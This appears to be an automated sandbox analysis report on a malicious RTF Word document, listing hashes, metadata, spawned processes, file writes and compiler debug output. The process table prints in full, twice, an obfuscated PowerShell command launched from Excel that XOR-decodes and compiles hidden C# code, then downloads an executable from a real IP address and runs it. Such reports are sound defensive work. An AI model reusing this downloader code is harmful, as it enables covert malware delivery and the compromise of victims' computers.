File name: | f5229d97f733e858cec79e26a3b58ae2.doc |
Full analysis: | https://app.any.run/tasks/400d9f14-e995-4a37-b3fa-ac66ae28263a |
Verdict: | Malicious activity |
Analysis date: | February 19, 2019, 08:33:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | F5229D97F733E858CEC79E26A3B58AE2 |
SHA1: | 74350F16BD71BE98D29189532D06A62F1CBC3E60 |
SHA256: | 4E90CB9F4536BD2A1E79DCC42F757DFB22BD7110F54B2B1C41AA114637C9593C |
SSDEEP: | 1536:oZdHt5ieI52b1bFCu6hYlDOyb1t5ieI52b1bFCu6hYlDOyb1t5ieI52b1bFCu6hu:oHk5IU5IU5IU5IU5IpV7 |
.rtf | | | Rich Text Format (100) |
---|
Author: | Admin |
---|---|
LastModifiedBy: | Admin |
CreateDate: | 2019:01:07 23:54:00 |
ModifyDate: | 2019:01:07 23:54:00 |
RevisionNumber: | 1 |
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 4 |
CharactersWithSpaces: | 4 |
InternalVersionNumber: | 57435 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2992 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f5229d97f733e858cec79e26a3b58ae2.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3836 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3236 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function kb8cf { param($cca8c7) $kabe8 = 'd1c687'; $u7fd21c = ''; for ($i = 0; $i -lt $cca8c7.length; $i+=2) { $v1f4587 = [convert]::ToByte($cca8c7.Substring($i, 2), 16); $u7fd21c += [char]($v1f4587 -bxor $kabe8[($i / 2) % $kabe8.length]); } return $u7fd21c; } $r13b = '11420a585f17374810425d5a5f3c69434b5e0a564365414410540e186a420a450a5b5d192d5f17534a58146206444e5e0754100d353d1444015a515444520f574b44445052570d53533c694d353d44114316181744113872545b2d5c13594a434c1308534a59015d50041a1e393c6916181744114316184711530f5f5b1717450242515444541b425d450a112a584c67104343715d4334430c557953004306454b1f2d5f17664c4544592e595c4208544f164b4316580d511847165e0078595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944780d42684316112f5959532858014459451d1910424a5e0a564358595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944530c595417325811424d56086111594c5207454b7f5643344511165447255507445d44171d4363715910611744185313620a4c5d1b44440a584c17025d2d534f67165e17535b4348110c434c1711580d42185b14570f79545334430c425d541018583b3217441143161817446a275a547e09410c444c1f467a06445652080251185c5b08134f167d5910431a66575e0a45430b181536450f7b5741017c065b57451d134f166b52107d02454c7216430c44180a4457025a4b524d6c6e3c181744114316181717450242515444541b425d450a1115595153447c0c405d7a015c0c44411f2d5f17664c45445506454c1b44780d426843161110445b1b44580d4218440d4b061f033a6e3c6916181744114316184711530f5f5b1717450242515444580d42184f5d055457101e693b4316181744114316433a6e114316181744114316181744780d42684316111b550003520005160517285e0252745e06430244411f0f535b555e1f460156035b06540405070e0257015b035c154d18583b321744114316181744114316185e02114b4e5b0f50075250180a59112a584c6710434d6c5d450b186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e3c691618174411431618174411437f5643344511164256050857160517235417664a58077007524a5217424b4e5b0f5007525014170f535b555e1f460356035b06540405005a02500156035e05550550035d02550152020b154d18583b321744114316181744114316185e02114b4c59565d05430b05172d5f17664c454a6b0644571e693b431618174411431618174411183b3217441143161817441143161817441143445d4311430d16090c693b4316181744114316181744111e3b323a6e114316181744114316181744642a584c67104343524f640d4b061605174c642a584c6710434a03033a6e114316181744114316181744440a584c173e541159180a4401583b321744114316181744114316185e02114b176e5e164516575467165e17535b434c4b02570103481107416b5e1e544f16084f50014f165742101139534a584d186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e114316181744114316181744731a425d6c391133574c540c115e16431754495007141754490550141754495a06184a5f3c691618174411431618174411437f5643344511164d5909500d575f5200610c5f56430143430b187a0543105e595b4a700f5a57542c760f595a560819501f033a6e1143161817441143161817447c02444b5f055d4d7557471d1933574c540c1d43061417115f0e57565603540766575e0a45064414175718583b321744114316181744114316187a0b47067b5d5a0b431a1e565213112a584c6710434b4c59565d054d62577e0a455502101e441a430640075400011f1417115f0e57565603540766575e0a45064414175718583b3217441143161817441143161845014516445617540a6e3c1817441143161817193c693f314711530f5f5b17174502425154444217445159031108540054021910424a5e0a5643454c452d5f4a3b3217441143161817444a6e3c313e6d42174451590311160e0b0550085a160517465552550e0f5313583b321744114316181744114316184410430a585f17170951045a17591130424a5e0a564d7355471048583b32174411431618174411431618510b43431e515910110a160517540a435f180b4442174471594a7d06585f430c0a435f181c5911511f353d4411431618174411431618171f3c6916181744114316181744114316181744531a425d171c0350035d0506115e167b580a4706444c19305e214f4c524c42174471594a6216544b4316580d51105e4811511f141755074a0d353d441143161817441143161817441143164b0f56030116130a4419005e59454d191b040b02010301166617110950040c0e5d6a4b5f181844034a161d17110950040c0e5d1f2f53565010593e1f033a6e1143161817441143161817444c6e3c353d441143161817441143161817165417434a5944425b040a555f3c6916181744114316184a693b1e'; $r13b2 = kb8cf($r13b); Add-Type -TypeDefinition $r13b2; [a1a5d7]::x947a(); Start-Sleep -s 1; $re5963f = $env:APPDATA; $u2cbc1 = $re5963f + '\\ec449.exe'; If (test-path $u2cbc1) {Remove-Item $u2cbc1}; $ed74b = New-Object System.Net.WebClient; $ed74b.Headers['User-Agent'] = 'ed74b'; $ed74b.DownloadFile('http://http://139.99.186.18:80/xml/new.exe', $u2cbc1); Start-Process -Filepath $u2cbc1; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2208 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\s5hzlapt.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3440 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES7CB3.tmp" "c:\Users\admin\AppData\Local\Temp\CSC7CB2.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3760 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2240 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function kb8cf { param($cca8c7) $kabe8 = 'd1c687'; $u7fd21c = ''; for ($i = 0; $i -lt $cca8c7.length; $i+=2) { $v1f4587 = [convert]::ToByte($cca8c7.Substring($i, 2), 16); $u7fd21c += [char]($v1f4587 -bxor $kabe8[($i / 2) % $kabe8.length]); } return $u7fd21c; } $r13b = '11420a585f17374810425d5a5f3c69434b5e0a564365414410540e186a420a450a5b5d192d5f17534a58146206444e5e0754100d353d1444015a515444520f574b44445052570d53533c694d353d44114316181744113872545b2d5c13594a434c1308534a59015d50041a1e393c6916181744114316184711530f5f5b1717450242515444541b425d450a112a584c67104343715d4334430c557953004306454b1f2d5f17664c4544592e595c4208544f164b4316580d511847165e0078595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944780d42684316112f5959532858014459451d1910424a5e0a564358595a0118583b3217441143161817446a275a547e09410c444c1f465a0644565208025114116a693b43161817441143164842065d0a5518441050175f5b17014917534a5944530c595417325811424d56086111594c5207454b7f5643344511165447255507445d44171d4363715910611744185313620a4c5d1b44440a584c17025d2d534f67165e17535b4348110c434c1711580d42185b14570f79545334430c425d541018583b3217441143161817446a275a547e09410c444c1f467a06445652080251185c5b08134f167d5910431a66575e0a45430b181536450f7b5741017c065b57451d134f166b52107d02454c7216430c44180a4457025a4b524d6c6e3c181744114316181717450242515444541b425d450a1115595153447c0c405d7a015c0c44411f2d5f17664c45445506454c1b44780d426843161110445b1b44580d4218440d4b061f033a6e3c6916181744114316184711530f5f5b1717450242515444580d42184f5d055457101e693b4316181744114316433a6e114316181744114316181744780d42684316111b550003520005160517285e0252745e06430244411f0f535b555e1f460156035b06540405070e0257015b035c154d18583b321744114316181744114316185e02114b4e5b0f50075250180a59112a584c6710434d6c5d450b186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e3c691618174411431618174411437f5643344511164256050857160517235417664a58077007524a5217424b4e5b0f5007525014170f535b555e1f460356035b06540405005a02500156035e05550550035d02550152020b154d18583b321744114316181744114316185e02114b4c59565d05430b05172d5f17664c454a6b0644571e693b431618174411431618174411183b3217441143161817441143161817441143445d4311430d16090c693b4316181744114316181744111e3b323a6e114316181744114316181744642a584c67104343524f640d4b061605174c642a584c6710434a03033a6e114316181744114316181744440a584c173e541159180a4401583b321744114316181744114316185e02114b176e5e164516575467165e17535b434c4b02570103481107416b5e1e544f16084f50014f165742101139534a584d186e3c181744114316181744114316433a6e1143161817441143161817441143161845014516445617550a6e3c181744114316181744114316453a6e114316181744114316181744731a425d6c391133574c540c115e16431754495007141754490550141754495a06184a5f3c691618174411431618174411437f5643344511164d5909500d575f5200610c5f56430143430b187a0543105e595b4a700f5a57542c760f595a560819501f033a6e1143161817441143161817447c02444b5f055d4d7557471d1933574c540c1d43061417115f0e57565603540766575e0a45064414175718583b321744114316181744114316187a0b47067b5d5a0b431a1e565213112a584c6710434b4c59565d054d62577e0a455502101e441a430640075400011f1417115f0e57565603540766575e0a45064414175718583b3217441143161817441143161845014516445617540a6e3c1817441143161817193c693f314711530f5f5b17174502425154444217445159031108540054021910424a5e0a5643454c452d5f4a3b3217441143161817444a6e3c313e6d42174451590311160e0b0550085a160517465552550e0f5313583b321744114316181744114316184410430a585f17170951045a17591130424a5e0a564d7355471048583b32174411431618174411431618510b43431e515910110a160517540a435f180b4442174471594a7d06585f430c0a435f181c5911511f353d4411431618174411431618171f3c6916181744114316181744114316181744531a425d171c0350035d0506115e167b580a4706444c19305e214f4c524c42174471594a6216544b4316580d51105e4811511f141755074a0d353d441143161817441143161817441143164b0f56030116130a4419005e59454d191b040b02010301166617110950040c0e5d6a4b5f181844034a161d17110950040c0e5d1f2f53565010593e1f033a6e1143161817441143161817444c6e3c353d441143161817441143161817165417434a5944425b040a555f3c6916181744114316184a693b1e'; $r13b2 = kb8cf($r13b); Add-Type -TypeDefinition $r13b2; [a1a5d7]::x947a(); Start-Sleep -s 1; $re5963f = $env:APPDATA; $u2cbc1 = $re5963f + '\\ec449.exe'; If (test-path $u2cbc1) {Remove-Item $u2cbc1}; $ed74b = New-Object System.Net.WebClient; $ed74b.Headers['User-Agent'] = 'ed74b'; $ed74b.DownloadFile('http://http://139.99.186.18:80/xml/new.exe', $u2cbc1); Start-Process -Filepath $u2cbc1; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3308 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\c6x8sxss.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
1812 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES928D.tmp" "c:\Users\admin\AppData\Local\Temp\CSC928C.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2616 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2992 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6D22.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3836 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR74B3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3236 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FB2YCXE48AI2AO3D6UCX.temp | — | |
MD5:— | SHA256:— | |||
2208 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC7CB2.tmp | — | |
MD5:— | SHA256:— | |||
2208 | csc.exe | C:\Users\admin\AppData\Local\Temp\s5hzlapt.pdb | — | |
MD5:— | SHA256:— | |||
3440 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES7CB3.tmp | — | |
MD5:— | SHA256:— | |||
2208 | csc.exe | C:\Users\admin\AppData\Local\Temp\s5hzlapt.dll | — | |
MD5:— | SHA256:— | |||
2208 | csc.exe | C:\Users\admin\AppData\Local\Temp\s5hzlapt.out | — | |
MD5:— | SHA256:— | |||
3760 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D6C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2240 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V319PEQABIZWHQ66FN78.temp | — | |
MD5:— | SHA256:— |
Process | Message |
---|---|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|